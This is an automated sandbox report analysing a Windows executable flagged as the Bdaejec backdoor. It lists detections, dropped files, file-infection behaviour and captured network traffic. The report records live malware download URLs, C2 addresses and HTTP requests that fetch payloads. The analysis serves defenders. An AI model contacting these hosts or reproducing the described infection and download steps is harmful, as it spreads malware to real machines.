Edit tour

Windows Analysis Report
5vrRrFN56j.exe

Overview

General Information

Sample name:	5vrRrFN56j.exe renamed because original name is a hash value
Original sample name:	5ad1a67084ee167d59560fbaec7529fe.exe
Analysis ID:	1589499
MD5:	5ad1a67084ee167d59560fbaec7529fe
SHA1:	9bc3b2a106eb0a8281bfa47baeeb0369d87f8036
SHA256:	ddd4a05ff6d0d64d56f4e49d9afbcaa80d20304163797f08f5f18804e73f795e
Tags:	exeuser-abuse_ch
Infos:

Detection

Bdaejec

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Bdaejec

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

Yara detected aPLib compressed binary

AV process strings found (often used to terminate AV products)

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

5vrRrFN56j.exe (PID: 1896 cmdline: "C:\Users\user\Desktop\5vrRrFN56j.exe" MD5: 5AD1A67084EE167D59560FBAEC7529FE)

WIJSmB.exe (PID: 6768 cmdline: C:\Users\user\AppData\Local\Temp\WIJSmB.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 7396 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1656 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
5vrRrFN56j.exe	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\update.exe	CN_Honker_WordpressScanner	Sample from CN Honker Pentest Toolset - file WordpressScanner.exe	Florian Roth	0xd571c:$s0: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) 0xe8368:$s1: (http://www.eyuyan.com) 0xcbd6c:$s2: GetConnectString 0xe2cd4:$s4: #if !defined(AFX_RESOURCE_DLL) \|\| defined(AFX_TARG_CHS)

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000000.2064107799.00000000006CD000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: 5vrRrFN56j.exe PID: 1896	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: WIJSmB.exe PID: 6768	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.0.5vrRrFN56j.exe.6e8260.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.0.5vrRrFN56j.exe.71e03c.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.5vrRrFN56j.exe.71e03c.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.5vrRrFN56j.exe.6e8260.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.0.5vrRrFN56j.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.5vrRrFN56j.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:37:04.331518+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	103.235.47.188	443	TCP

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:37:03.582373+0100	2807908	1	Malware Command and Control Activity Detected	192.168.2.5	49705	44.221.84.105	799	TCP

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:37:02.998602+0100	2838522	1	Malware Command and Control Activity Detected	192.168.2.5	50370	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 5vrRrFN56j.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k2.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.raryF	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarD	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar?p	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarAcrobat	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarQ	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarD	Avira URL Cloud: Label: malware
Source: http://47.92.98.180:88/MQNT/MQNT.exe	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	ReversingLabs: Detection: 97%
Source: C:\Users\user\Desktop\update.exe	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: 5vrRrFN56j.exe

ReversingLabs: Detection: 94%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\update.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 5vrRrFN56j.exe

Joe Sandbox ML: detected

Source: 5vrRrFN56j.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 103.235.47.188:443 -> 192.168.2.5:49704 version: TLS 1.2

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Code function: 1_2_004A29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_004A29E2

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Code function: 1_2_004A2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_004A2B8C

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.5:50370 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.5:49705 -> 44.221.84.105:799

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49705 -> 799

Source: global traffic

TCP traffic: 192.168.2.5:49705 -> 44.221.84.105:799

Source: Joe Sandbox View	IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View	IP Address: 103.235.47.188 103.235.47.188
Source: Joe Sandbox View	IP Address: 103.235.47.188 103.235.47.188

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 103.235.47.188:443

Source: global traffic	HTTP traffic detected: HEAD / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AliveAccept: text/html, application/xhtml+xml, /Accept-Encoding: identityAccept-Language: zh-cnUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Host: www.baidu.com
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Code function: 1_2_004A1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

1_2_004A1099

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic	DNS traffic detected: DNS query: www.baidu.com

Source: WIJSmB.exe, 00000001.00000003.2065758471.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: 5vrRrFN56j.exe	String found in binary or memory: http://47.92.98.180:18081/myauth/web/getUserCount?skey=c0ecd8de-75e7-47a6-a22b-8adedbf78780&apikey=c
Source: update.exe.0.dr	String found in binary or memory: http://47.92.98.180:88/MQNT/GX_RZ.txt
Source: 5vrRrFN56j.exe	String found in binary or memory: http://47.92.98.180:88/MQNT/MQNT.exe
Source: 5vrRrFN56j.exe, update.exe.0.dr	String found in binary or memory: http://47.92.98.180:88/MQNT/data.txt
Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000F32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074353030.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: WIJSmB.exe, 00000001.00000003.2074353030.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarAcrobat
Source: WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarD
Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarQ
Source: WIJSmB.exe, 00000001.00000003.2074065250.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raryF
Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332812102.0000000000F32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: WIJSmB.exe, 00000001.00000002.2333336401.000000000141A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar?p
Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarD
Source: 5vrRrFN56j.exe	String found in binary or memory: http://ip-api.com/json/?lang=zh-CN
Source: 5vrRrFN56j.exe	String found in binary or memory: http://q1.qlogo.cn/g?b=qq&nk=
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: 5vrRrFN56j.exe	String found in binary or memory: http://whois.pconline.com.cn/ipJson.jsp?json=true
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: 5vrRrFN56j.exe	String found in binary or memory: http://www.eyuyan.com
Source: 5vrRrFN56j.exe, update.exe.0.dr	String found in binary or memory: http://www.eyuyan.com)DVarFileInfo$
Source: 5vrRrFN56j.exe	String found in binary or memory: http://www.eyuyan.comservice
Source: 5vrRrFN56j.exe	String found in binary or memory: http://www.ibsensoftware.com/
Source: 5vrRrFN56j.exe	String found in binary or memory: http://www.ip138.com
Source: 5vrRrFN56j.exe	String found in binary or memory: http://www.ip138.comUser-Agent:
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: 5vrRrFN56j.exe	String found in binary or memory: https://api.ip.sb/ip
Source: 5vrRrFN56j.exe	String found in binary or memory: https://cdid.c-ctrip.com/model-poc2/h
Source: 5vrRrFN56j.exe	String found in binary or memory: https://cdid.c-ctrip.com/model-poc2/hhttps://ip.cn/api/index?ip=&type=0User-Agent:
Source: 5vrRrFN56j.exe	String found in binary or memory: https://club.vip.qq.com/api/aggregation?g_tk=
Source: 5vrRrFN56j.exe	String found in binary or memory: https://club.vip.qq.com/api/aggregation?g_tk=content-type:
Source: 5vrRrFN56j.exe	String found in binary or memory: https://ip.cn/api/index?ip=&type=0
Source: 5vrRrFN56j.exe	String found in binary or memory: https://ipinfo.io/json
Source: WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: 5vrRrFN56j.exe	String found in binary or memory: https://www.baidu.com
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten
Source: 5vrRrFN56j.exe	String found in binary or memory: https://www.uc.cn/ip
Source: 5vrRrFN56j.exe	String found in binary or memory: https://www.uc.cn/ipIP:https://api.ip.sb/iphttps://ipinfo.io/jsonip

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 103.235.47.188:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_a03d4125-9

System Summary

Malicious sample detected (through community Yara rule)

Source: C:\Users\user\Desktop\update.exe, type: DROPPED

Matched rule: Sample from CN Honker Pentest Toolset - file WordpressScanner.exe Author: Florian Roth

PE file contains section with special chars

Source: MyProg.exe.1.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: WIJSmB.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Code function: 1_2_004A6076		1_2_004A6076
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Code function: 1_2_004A6D00		1_2_004A6D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\WIJSmB.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1656

Source: MyProg.exe.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: 5vrRrFN56j.exe, 00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXY.HWSS.dllf# vs 5vrRrFN56j.exe
Source: 5vrRrFN56j.exe, 00000000.00000002.2150800723.00000000006CD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamexy.WSS.HTTPS.dllp( vs 5vrRrFN56j.exe
Source: 5vrRrFN56j.exe	Binary or memory string: OriginalFilenameXY.HWSS.dllf# vs 5vrRrFN56j.exe
Source: 5vrRrFN56j.exe	Binary or memory string: OriginalFilenamexy.WSS.HTTPS.dllp( vs 5vrRrFN56j.exe

Source: 5vrRrFN56j.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\update.exe, type: DROPPED

Matched rule: CN_Honker_WordpressScanner date = 2015-06-23, author = Florian Roth, description = Sample from CN Honker Pentest Toolset - file WordpressScanner.exe, score = 0b3c5015ba3616cbc616fc9ba805fea73e98bc83, reference = Disclosed CN Honker Pentest Toolset, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: WIJSmB.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: WIJSmB.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: WIJSmB.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@5/14@2/2

Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Code function: 1_2_004A119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_004A119F

Source: C:\Users\user\Desktop\5vrRrFN56j.exe

File created: C:\Users\user\Desktop\update.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6768

Source: C:\Users\user\Desktop\5vrRrFN56j.exe

File created: C:\Users\user\AppData\Local\Temp\WIJSmB.exe

Jump to behavior

Source: C:\Users\user\Desktop\5vrRrFN56j.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\5vrRrFN56j.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 5vrRrFN56j.exe

ReversingLabs: Detection: 94%

Source: unknown	Process created: C:\Users\user\Desktop\5vrRrFN56j.exe "C:\Users\user\Desktop\5vrRrFN56j.exe"
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Process created: C:\Users\user\AppData\Local\Temp\WIJSmB.exe C:\Users\user\AppData\Local\Temp\WIJSmB.exe
Source: C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1656
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Process created: C:\Users\user\AppData\Local\Temp\WIJSmB.exe C:\Users\user\AppData\Local\Temp\WIJSmB.exe	Jump to behavior

Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\5vrRrFN56j.exe	Section loaded: coreuicomponents.dll	Jump to behavior
